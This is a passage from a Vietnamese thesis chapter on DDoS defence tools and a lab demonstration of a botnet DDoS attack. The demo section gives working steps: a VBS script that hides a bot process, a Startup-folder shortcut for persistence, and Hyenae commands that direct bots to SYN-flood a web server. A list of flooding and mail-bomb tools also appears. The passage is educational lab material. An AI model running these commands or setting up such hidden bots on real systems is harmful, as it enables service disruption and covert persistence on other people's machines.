CÁC CÔNG CỤ BẢO VỆ DoS/DDoS

2.6.1. NetFlow Analyzer

NetFlow Analyzer, một công cụ phân tích lƣu lƣợng đầy đủ, thúc đẩy công nghệ phân tích lƣu lƣợng để cung cấp khả năng hiển thị thời gian thực và hiệu suất băng thông mạng. Chủ yếu NetFlow Analyzerlà một công cụ giám sát băng thông,đã đƣợc tối ƣu hóa hàng ngàn mạng lƣới trên toàn thế giới bằng cách đƣa ra cái nhìn toàn diện về băng thông mạng và các mẫu lƣu lƣợng truy cập.

52

NetFlow Analyzer là một giải pháp thống nhất thu thập, phân tích và báo cáo về băng thông mạng của bạn đang đƣợc sử dụng và ngƣời sử dụng. NetFlow Analyzer là đối tác tin cậy tối ƣu hóa việc sử dụng băng thông trên toàn thể giới ngoài ra nó thực hiện giám định mạng và phân tích lƣu lƣợng mạng.

H nh 2.11: Công cụ NetFlow Analyzer 2.6.2. Một số công cụ khác

+D-Guard Anti-DDoSFirewall

- D-Guard Anti-DDoS Firewall cung cấp đáng tin cậy nhất và nhanh nhất bảo vệ DDoS cho các doanh nghiệp trực tuyến, và các dịch vụ phƣơng tiện truyền thông, thiết yếu hạ tầng công cộng và cung cấp dịch vụ Internet.

- Là một chuyên nghiệp Anti-DDoS Firewall, D-Guard có thể bảo vệ chống lại hầu hết các cuộc tấn công các loại, bao gồm cả DoS / DDoS, Super DDoS, DrDoS, Fragment tấn công, tấn công SYN lũ lụt, lũ lụt tấn công IP, UDP, UDP đột biến, ngẫu nhiên UDP Flooding tấn công, ICMP, IGMP tấn công, ARP Spoofing, HTTP Proxy tấn công, CC Flooding tấn công, CC Proxy tấn công,…

53

- D-Guard Anti-DDoS Firewall cung cấp một cấp trên cách tiếp cận cơ bản để giảm nhẹ các cuộc tấn công DDoS, với một thiết kế tập trung vào giao thông qua hợp pháp chứ không phải là loại bỏ giao thông tấn công, xử lý các cuộc tấn công kịch bản có thể suy thoái tồi tệ nhất mà không cần hiệusuất.

H nh 2.12: Công cụ D-Guard Anti-DDoS Firewall

+ FortGuardFirewall

- FortGuard Firewall một giải pháp giúp ngƣời dùng chống lại các cuộc tấn công DDoS với độ chính xác và hiệu suất cao nhất...

- FortGuard Firewall là một phần mềm tƣờng lửa Anti-DDoS nhỏ nhƣng mạnh mẽ với Intrusion Prevention System sẵn có. Nó có thể bảo vệ máy tính của bạn chống lại các cuộc tấn công DDoS chính xác nhất với hiệu suất cao nhất. - - FortGuard Firewall có thể chống lại SYN, TCP Flooding và các loại tấn công DDoS khác và khả năng thấy đƣợc các gói tấn công thời gian thực. Chƣơng trình cho phép bạn vô hiệu hóa/ kích hoạt truy cập qua proxy vào tầng ứng dụng và có thể ngăn chặn hơn 2000 kiểu hoạt động củahacker.

54

H nh 2.13: Công cụ FortGuard Firewall 2.7. KIỂM TRA THÂM NHẬP DoS/ DDoS

Hệ thống server dễ bị tấn công DoS thì nên kiểm tra thâm nhập để tìm hiểu để đối phó. Một hệ thống dễ bị tấn công không thể xử lý số lƣợng lớn lƣu lƣợng gửi và sau đó bị treo hoặc giảm tốc độ, do đó ngăn ngừa truy cập bằng cách chứng thực ngƣời sử dụng. Kiểm tra thâm nhập xác định ngƣỡng tối thiểu cuộc tấn công DoS trên hệ thống , nhƣng ngƣời kiểm thử không chủ quan là hệ thống bền vững trƣớc chống tấn công DoS. Đối tƣợng chính để kiểm tra thâm nhập DoS làm tràn ngập lƣu lƣợng hệ thống mục tiêu, tƣơng tự nhƣ hàng trăm ngƣời liên tục yêu cầu dịch vụ, làm cho server hoạt động liên tục không có giá trị.

Dùng tool kiểm tra theo các bƣớc nhƣ sau:

1) Kiểm tra web server dùng công cụ tự động nhƣ là Web Application Stress(WAS) và Jmeter cho khả năng chịu tải, hiệu suất server, khóa, và khả năng mở rộng phátsinh.

2) Quét hệ thống dùng công cụ tự động nhƣ NMAP, GFI LANGuard, và Nessus để khám phá bất kỳ hệ thống dễ bị tấn công DoS.

55

3) Tràn ngập mục tiêu với yêu cầu gói tin kết nối dùng công cụ Trin00, Tribe Flood, vàTFN2K.

4) Tấn công tràn ngập cổng để làm đầy cổng và tăng sử dụng duy trì tất cả yêu cầu kết nối làm tắc nghẽn cổng. Dùng công cụ Mutilate and Pepsi5 để tự động tấn cộng tràn ngập cổng.

5) Dùng công cụ Mail Bomber, Attache Bomber, và Advanced Mail Bomber để gửi số lƣợng mail lớn cho mail server mục tiêu.

6) Điền vào các mẫu nội dung tùy ý và kéo dài làm tràn ngập trang web.

2.8. KẾT LUẬN CHƢƠNG 2

Chƣơng 2 tác giả đi sâu tìm hiểu về các biện pháp đối phó tấn công DoS và DDoS, các kỹ thuật phòng thủ chống lại Botnet, Các công cụ bảo vệ khi có tấn công DoS và DDoS. Ngoài ra tác giả còn đi sâu tìm hiểu, kiểm tra các thâm nhập DoS/DdoS.Từ đó rút ra nhiều kết luận hữu ích phục vụ cho công việc Demo ở chƣơng 3.

56

CHƢƠNG 3: DEMO TẤN CÔNGVÀ PHÒNG THÙ DDOS 3.1. Kịch bản DeMo tấn công DDoS

H nh 3.1: Mô hình Demo tấn công DDoS

Trong đó:

 01 Máy chủ WebServer sử dụng Windows 7 có cài sẵn XAMMP.  05 Máy trạm Botnet.

 01 trang Web tự tạo để phục vụ DEMO.

 Phần mềm: Vmware Workstation 12 Pro, BackTrack 5r3, Hyenaed, Wireshark, Metter.

Giới thiệu sơ lƣợc về phần mềm Vmware Workstation 12 Pro

VMware Workstation 12 Pro là sản phẩm mới nhất trong dòng sản phẩm rất thành công của VMware. Đây thực sự là công cụ hữu ích cho các lập trình viên, chuyên gia quản trị hệ thống và cả những ngƣời dùng cá nhân khi muốn khám phá, thử nghiệm hay đơn giản chỉ là xem qua cho biết một sản phẩm phần mềm mới.

Máy tính ảo, đúng với tên gọi nó có mọi chức năng nhƣ một máy tính bình thƣờng chỉ khác một điều là máy tính ảo chạy trên nền của máy tính thật. Một máy tính thật chạy phần mềm VMware Workstation 12 Pro có thể hỗ trợ vô số các máy ảo chạy trên nó với giới hạn chỉ là ở dung lƣợng ổ cứng. Các máy tính ảo có thể

57

chạy đồng thời số lƣợng tùy thuộc vào lƣợng bộ nhớ RAM của hệ thống thật, thậm chí các máy ảo này còn có thể liên lạc với nhau tạo thành một mô hình mạng ảo. Với phần mềm ảo hóa, thì nhà quản trị hệ thống có thể cài đặt một máy ảo chạy hệ điều hành mới để kiểm tra tính ổn định, các chuyên gia phát triển phần mềm có thể kiểm tra sản phẩm của mình chạy trên nền những hệ điều hành khác nhau một cách nhanh nhất, những nhà nghiên cứu phần mềm độc hại có thể phân tích một virus mới mà không hề gây tổn hại đến máy tính thật và ngƣời dùng bình thƣờng có thể chạy các phần mềm mà chỉ có thể chạy trên các hệ điều hành cũ.

Giới thiệu sơ lƣợc về phần mềm BackTrack 5r3

Phiên bản BackTrack 5 có tên mã là “Revolution” ( tạm dịch là “Cải tiến” ), phiên bản này rất đƣợc giới bảo mật (nhất là giới Hack) mong đợi; phiên bản này đƣợc phát hành vào tháng 05 năm 2011. BackTrack 5 đƣợc đặt tên theo một thuật toán đƣợc gọi là “backtracking” .BackTrack 5 cung cấp một bộ các công cụ từ crack password, pentest và scan ports .BackTrack 5 có 12 bộ các công cụ:

Information gathering: Thu thập thông tin (Trang web, máy chủ mail…)

Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về hệ điều hành, ứng dụng đƣợc sử dụng bởi mục tiêu…

Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).

Web application analysis: Theo dõi, giám sát các ứng dụng web.

Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID).

Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.

Privilege escalation: Sau khi khai thác các lỗ hổng và đƣợc truy cập vào các máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.

Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền cao nhất là điều kiện cần thiết trƣớc khi có thể cài đặt công cụ để duy trì quyền truy cập.

58

Voice Over IP (VOIP): Các công cụ để phân tích VOIP.

Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start Backtrack Forensics trong trình đơn khởi động.

Reverse engineering: Gỡ rối chƣơng trình hoặc tháo rời tập tin thực thi.

Giới thiệu sơ lƣợc về phần mềm Wireshark

Wireshark là một công cụ kiểm tra, theo dõi và phân tích thông tin mạng đƣợc phát triển bởi Gerald Combs. Phiên bản đầu tiên của Wireshark mang tên Ethereal đƣợc phát hành năm 1988. Đến nay, WireShark vƣợt trội về khả năng hỗ trợ các giao thức (khoảng 850 loại), từ những loại phổ biến nhƣ TCP, IP đến những loại đặc biệt nhƣ là AppleTalk và Bit Torrent.

Các tiện ích của phần mềm Wireshark: Thân thiện với ngƣời dùng: Giao diện của Wireshark là một trong những giao diện phần mềm phân tích gói dễ dùng nhất. Wireshark là ứng dụng đồ hoạ với hệ thống menu rất rõ ràng và đƣợc bố trí dễ hiểu.

Giá rẻ: Wireshark là một sản phẩm miễn phí. Bạn có thể tải về và sử dụng Wireshark cho bất kỳ mục đích nào, kể cả với mục đích thƣơng mại.

Hỗ trợ: Cộng đồng của Wireshark là một trong những cộng đồng tốt và năng động nhất của các dự án mã nguồn mở.

Hệ điều hành hỗ trợ Wireshark: Wireshark hỗ trợ hầu hết các loại hệ điều hành hiện nay.

Một số tính năng nâng cao của Wireshark:

 Name Resolution: phân giải và chuyển đổi địa chỉ, hỗ trợ việc ghi nhớ.  Protocol dissector: cho phép Wireshark phân chia một giao thức thành một số thành phần để phân tích.

 Following TCP Streams: một trong những tính năng hữu ích nhất của Wireshark là khả năng xem các dòng TCP nhƣ là ở tầng ứng dụng Cửa sổ thống kê phân cấp

 Giao thức Xem các Endpoints  Cửa sổ đồ thị IO,…

59

Giới thiệu sơ lƣợc về phần mềm DU Meter

DU Meter cung cấp cho ngƣời dùng khả năng kiểm tra đƣờng truyền internet bất kỳ lúc nào. Phần mềm cho phép ngƣời dùng kiểm tra tốc độ download và upload thực tế tại các thời điểm khác nhau. DU Meter còn cung cấp tính năng bấm đồng hồ để đo chính xác thời gian download của đƣờng truyền và báo cáo lại.

DU Meter đƣợc sử dụng kiểm tra tốc độ download, upload của website, email hay các ứng dụng khác. Việc làm này giúp ích cho các lập trình viên dùng để test hoạt động của các trang web trên các server khác nhau.

DU Meter còn hiển thị biểu đồ biểu diễn tốc độ và lƣu lƣợng sử dụng internet trên đƣờng truyền nhà mình, văn phòng và có thể xuất ra file định dạng Excel, HTML để ngƣời dùng theo dõi. Hơn nữa, DU Meter còn có tính năng tự động cắt đƣờng truyền nếu thấy đƣờng truyền mạng quá thấp so với quy định.

Những tính năng chính của DU Meter:

- Kiểm tra đƣờng truyền internet bất kỳ lúc nào nhanh chóng và chính xác. - Test tốc độ download và upload của đƣờng truyền mạng để kịp thời xử lý những tình huống phát sinh.

- Cung cấp tính năng vƣợt trội và thay thế các công cụ kiểm tra tốc độ đƣờng truyền internet khác.

- Tính năng bấm đồng hồ để đo chính xác thời gian download của đƣờng truyền và báo cáo lại.

- Hiển thị biểu đồ biểu diễn tốc độ và lƣu lƣợng sử dụng internet trên đƣờng truyền nhà mình, văn phòng và có thể xuất ra file định dạng Excel, HTML.

- Tốc độ kiểm tra cực nhanh và dễ dàng sử dụng.

- Kiểm tra hoạt động của các trang web trên các server khác nhau.

- Tự động cắt đƣờng truyền nếu thấy đƣờng truyền mạng quá thấp so với quy định.

60

Giới thiệu sơ lược về phần mềm Hyenae

Hyena ra đời nhằm mục đích cung cấp cho bạn một phƣơng tiện quản trị toàn diện hệ thống mạng theo cách thức đơn giản, tập trung và duy nhất. Đƣợc sử dụng rộng rãi bởi hàng ngàn quản trị hệ thống trên toàn cầu, Hyena là một công cụ mà ngƣời quản trị không thể bỏ qua. Với giao diện và các thao tác quản lý đƣợc thiết kế theo kiểu Explorer, bao gồm cả menu ngữ cảnh tƣơng ứng với tất cả các đối tƣợng, Hyena giúp bạn quản lý gần nhƣ toàn bộ các thành phần trong mạng nhƣ: user, group, share, domain, computer, service, printer, file, session, disk space, user right, job scheduling, processes, messaging…

Hyena có thể chạy trên bất kỳ hệ điều hành Windows nào dành cho máy trạm, kể cả Windows 7. Đồng thời, công cụ này có thể quản trị bất kỳ hệ điều hành Windows nào dành cho máy chủ, kể cả Windows Server 2008.

3.2. Hƣớng dẫn tạo cuộc tấn công DDoS: 3.2.1. Cài đặt Clone máy trạm 3.2.1. Cài đặt Clone máy trạm

Bƣớc 1: Bật Vmware, cài đặt clone máy trạm: Kích chuột phải vào máy trạm BotNet01 trên thanh công cụ Manage  Clone.

H nh 3.2: cài đặt Clone máy trạm

Bƣớc 6: Chọn tên Máy ảo và Thƣ mục chạy máy ảo. Đối với máy C&C: Đặt tên là C&C

61

Đối với máy trạm Botnet: Đặt tên là BOTNET01, BOTNET02, BOTNET03, Backtrack5r3…

H nh 3.3: Đặt tên cho các máy trạm

Chọn Finish và đợi hệ thống Clone

3.2.2. Khởi động máy chủ Webserver và thiết lập cấu hình

62

H nh 3.4:Cấu hình máy chủ WebServer

Cấu hình Network Adapter: Chọn Custom VMnet1

H nh 3.5: Thiết lập các cấu hình cho Webserver

63

H nh 3.6: Cài đặt địa chỉ IP cho máy chủ

Khởi động dịch vụ XAMPP, chạy Apache

H nh 3.7: Thiết lập thông số cho XAMPP

64

H nh 3.8: Giao diện khi chạy Apache

Truy cập đƣờng dẫn http://192.168.88.128 để kiểm tra dịch vụ

65

3.2.3 Khởi động máy chủ Botnet

Đảm bảo cấu hình card mạng phải để ở chế độ Bridged

H nh 3.1 : Giao diện BOTNET01

Đặt ip cho máy BOTNET01 nhƣ sau

66

Các máy khác có thể đặt thêm nhƣ BOTNET02 192.168.1.102, BOTNET03 192.168.1.103….

Kiểm tra kết nối tới máy Firewall và máy chủ Web Server

H nh 3.12: Kiểm tra kết nối của BOTNET tới Firewall và máy chủ Webserver

Tạo Bot lắng nghe trên cổng 666

Trong thƣ mục C:\Program Files\Hyenae chọn new  text Document Nội dung file điền nhƣ sau:

67

Save file và đổi tên file thành Botnet.bat. Lƣu ý trƣớc khi đổi bỏ chọn Hide extensions for known file types

H nh 3.13: Cách tạo file Botnet.Bat

H nh 3.14: Giao diện sau khi tạo file Botnet.Bat

68

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save và đổi tên file thành invisible.vbs

H nh 3.15: Giao diện sau khi tạo file Invisible.vbs

Tiếp tục tạo 01 file text mới với nội dung nhƣ sau:

wscript.exe "C:\Program Files\Hyenae\invisible.vbs" "C:\Program Files\Hyenae\Botnet.bat"

69

H nh 3.16: Giao diện sau khi tạo file Botnetstartup.bat

Tạo shortcut cho file Botnetstartup.bat

H nh 3.17: Tạo shortcut cho file Botnetstartup.bat

Copy file shortcut vào thƣ mục C:\Documents and Settings\All Users\Start Menu\Programs\Startup ( Nhằm mục đích mỗi khi máy tính khởi động lại file này sẽ tự chạy. Sẽ chạy ẩn tiến trình)

70

H nh 3.18: Đƣờng dẫn cho file Botnetstartup.bat

Chạy file Botnetstartup.bat nếu chƣa đƣợc chạy (Sau này mỗi lần khởi động lại máy trạm sẽ không cần chạy file này nữa). Kiểm tra xem tiến trình có chạy không? Đảm bảo có tiến trình Hyenaed.exe là ok.

H nh 3.19: Kiểm tra cấu hình file Hyenaed.exe trong cmd.exe

Vậy là xong phần setup máy BOTNET. GIờ đến phần C&C Server.

Nếu muốn thêm máy BOTNET khác có thể Clone luôn từ máy này. Làm tƣơng tự các bƣớc nhƣ trên để tạo thêm máy BOTNET.

71

3.2.4. Khởi động máy chủ C&C Server và thực hiện tấn công.

Khởi động máy chủ C&C Server

Xác định địa chỉ MAC của Gateway (là Interface E0/0 trên Firewall).

H nh 3.2 : Địa chỉ MAC của C&C Server

Điều khiển tấn công máy chủ webserver từ máy chủ C&C Server

H nh 3.21: Giao diện máy C&C

72

hyenae.exe -r 192.168.1.101@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1 Trong đó 00:ab:cd:92:52:00 là địa chỉ MAC của Gateway

192.168.1.101 là địa chỉ IP của máy BOTNET01

Để điều khiển máy BOTNET02 với IP 192.168.1.102 ta vào cmd gõ lệnh sau: hyenae.exe -r 192.168.1.102@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1 Để điều khiển máy BOTNET03 với IP 192.168.1.103 ta vào cmd gõ lệnh sau: